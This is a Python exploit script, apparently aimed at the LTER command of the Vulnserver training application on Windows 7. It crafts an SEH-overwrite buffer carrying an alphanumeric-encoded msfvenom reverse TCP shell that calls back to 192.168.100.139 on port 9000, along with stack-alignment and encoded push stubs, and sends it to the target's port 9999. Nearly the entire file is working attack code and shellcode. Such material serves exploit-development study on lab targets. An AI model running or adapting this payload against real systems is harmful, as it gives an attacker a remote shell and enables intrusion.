# Author: Felipe Winsnes (@whitecr0wz)
# Tested on Windows 7 (x86)

import socket, sys, struct

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.139 LPORT=9000 -f py -e x86/alpha_mixed BufferRegister=ESI EXITFUNC=thread
# Payload size: 702 bytes

buf =  b""
buf += b"\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += b"\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += b"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += b"\x79\x6c\x59\x78\x6f\x72\x45\x50\x47\x70\x37\x70\x73"
buf += b"\x50\x6f\x79\x7a\x45\x44\x71\x59\x50\x70\x64\x4c\x4b"
buf += b"\x70\x50\x64\x70\x4c\x4b\x72\x72\x34\x4c\x6e\x6b\x73"
buf += b"\x62\x62\x34\x6e\x6b\x44\x32\x45\x78\x56\x6f\x6e\x57"
buf += b"\x42\x6a\x35\x76\x66\x51\x6b\x4f\x4c\x6c\x77\x4c\x71"
buf += b"\x71\x73\x4c\x36\x62\x66\x4c\x55\x70\x4a\x61\x58\x4f"
buf += b"\x64\x4d\x65\x51\x4a\x67\x4a\x42\x59\x62\x76\x32\x72"
buf += b"\x77\x4e\x6b\x66\x32\x64\x50\x4e\x6b\x72\x6a\x65\x6c"
buf += b"\x6c\x4b\x70\x4c\x64\x51\x43\x48\x59\x73\x63\x78\x37"
buf += b"\x71\x38\x51\x50\x51\x4e\x6b\x50\x59\x51\x30\x35\x51"
buf += b"\x6b\x63\x6c\x4b\x33\x79\x45\x48\x4b\x53\x57\x4a\x43"
buf += b"\x79\x6c\x4b\x47\x44\x4e\x6b\x66\x61\x49\x46\x55\x61"
buf += b"\x6b\x4f\x6c\x6c\x49\x51\x6a\x6f\x74\x4d\x55\x51\x6b"
buf += b"\x77\x50\x38\x6d\x30\x42\x55\x4c\x36\x75\x53\x73\x4d"
buf += b"\x68\x78\x37\x4b\x33\x4d\x75\x74\x54\x35\x79\x74\x71"
buf += b"\x48\x4c\x4b\x53\x68\x44\x64\x67\x71\x59\x43\x35\x36"
buf += b"\x6e\x6b\x44\x4c\x70\x4b\x6c\x4b\x33\x68\x57\x6c\x35"
buf += b"\x51\x4b\x63\x6e\x6b\x57\x74\x6c\x4b\x33\x31\x38\x50"
buf += b"\x6b\x39\x51\x54\x77\x54\x37\x54\x33\x6b\x31\x4b\x63"
buf += b"\x51\x31\x49\x53\x6a\x53\x61\x59\x6f\x6d\x30\x43\x6f"
buf += b"\x73\x6f\x33\x6a\x6e\x6b\x65\x42\x68\x6b\x6e\x6d\x73"
buf += b"\x6d\x45\x38\x64\x73\x47\x42\x53\x30\x77\x70\x73\x58"
buf += b"\x34\x37\x73\x43\x70\x32\x73\x6f\x63\x64\x50\x68\x52"
buf += b"\x6c\x70\x77\x44\x66\x67\x77\x6b\x4f\x79\x45\x6d\x68"
buf += b"\x7a\x30\x77\x71\x65\x50\x77\x70\x75\x79\x69\x54\x36"
buf += b"\x34\x30\x50\x33\x58\x44\x69\x4d\x50\x72\x4b\x43\x30"
buf += b"\x59\x6f\x4b\x65\x66\x30\x46\x30\x56\x30\x32\x70\x37"
buf += b"\x30\x50\x50\x37\x30\x36\x30\x71\x78\x78\x6a\x76\x6f"
buf += b"\x59\x4f\x4b\x50\x79\x6f\x38\x55\x4c\x57\x52\x4a\x53"
buf += b"\x35\x55\x38\x4f\x30\x6c\x68\x55\x34\x6c\x4b\x35\x38"
buf += b"\x65\x52\x45\x50\x67\x53\x54\x68\x6f\x79\x68\x66\x70"
buf += b"\x6a\x76\x70\x63\x66\x31\x47\x61\x78\x4d\x49\x49\x35"
buf += b"\x72\x54\x35\x31\x6b\x4f\x48\x55\x4e\x65\x49\x50\x54"
buf += b"\x34\x76\x6c\x49\x6f\x50\x4e\x65\x58\x42\x55\x7a\x4c"
buf += b"\x71\x78\x58\x70\x4c\x75\x6d\x72\x36\x36\x69\x6f\x58"
buf += b"\x55\x32\x48\x52\x43\x50\x6d\x75\x34\x35\x50\x4f\x79"
buf += b"\x5a\x43\x50\x57\x71\x47\x56\x37\x76\x51\x5a\x56\x72"
buf += b"\x4a\x45\x42\x66\x39\x56\x36\x6a\x42\x79\x6d\x73\x56"
buf += b"\x4a\x67\x63\x74\x61\x34\x47\x4c\x35\x51\x75\x51\x4e"
buf += b"\x6d\x71\x54\x35\x74\x54\x50\x6f\x36\x33\x30\x77\x34"
buf += b"\x76\x34\x52\x70\x50\x56\x52\x76\x31\x46\x32\x66\x76"
buf += b"\x36\x62\x6e\x63\x66\x62\x76\x63\x63\x36\x36\x50\x68"
buf += b"\x44\x39\x6a\x6c\x75\x6f\x6f\x76\x49\x6f\x78\x55\x6c"
buf += b"\x49\x69\x70\x32\x6e\x42\x76\x77\x36\x59\x6f\x54\x70"
buf += b"\x62\x48\x46\x68\x4e\x67\x55\x4d\x33\x50\x59\x6f\x4b"
buf += b"\x65\x6f\x4b\x59\x70\x57\x6d\x67\x5a\x36\x6a\x45\x38"
buf += b"\x6c\x66\x6f\x65\x4f\x4d\x4d\x4d\x39\x6f\x59\x45\x77"
buf += b"\x4c\x33\x36\x53\x4c\x45\x5a\x6b\x30\x4b\x4b\x79\x70"
buf += b"\x33\x45\x56\x65\x4d\x6b\x52\x67\x37\x63\x51\x62\x52"
buf += b"\x4f\x52\x4a\x43\x30\x42\x73\x6b\x4f\x79\x45\x41\x41"

alignment = ""
alignment += "\x54\x58\x54\x5B"
alignment += "\x66\x05\x58\x13"
alignment += "\x50\x5C"
alignment += "\x53\x58"
alignment += "\x66\x05\x68\x05"
alignment += "\x50\x5E"

# root@whitecr0wz:~/Exploit-Dev/LTER# slink
# Enter your shellcode: \x53\x5C\x56\xC3
# Enter shellcode variable name: pushesi
# [+] Shellcode size is divisible by 4
# [*] Encoding [c3565c53]..
# [+] No bad character found, using default encoder..
# [*] Shellcode final size: 21 bytes

pushesi = ""
pushesi += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
pushesi += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
pushesi += "\x05\x32\x36\x33\x62" ## add  eax, 0x62333632
pushesi += "\x05\x21\x26\x23\x61" ## add  eax, 0x61232621
pushesi += "\x50"                 ## push eax

nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x6250195E)

buffer = "LTER /.:/" + "A" * 3 + buf + "A" * (3515 - 3 - len(buf)) + nseh + seh + "A" * 2 + alignment + pushesi + "A" * 200

host = sys.argv[1]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host, 9999))

s.send(buffer)

s.close()
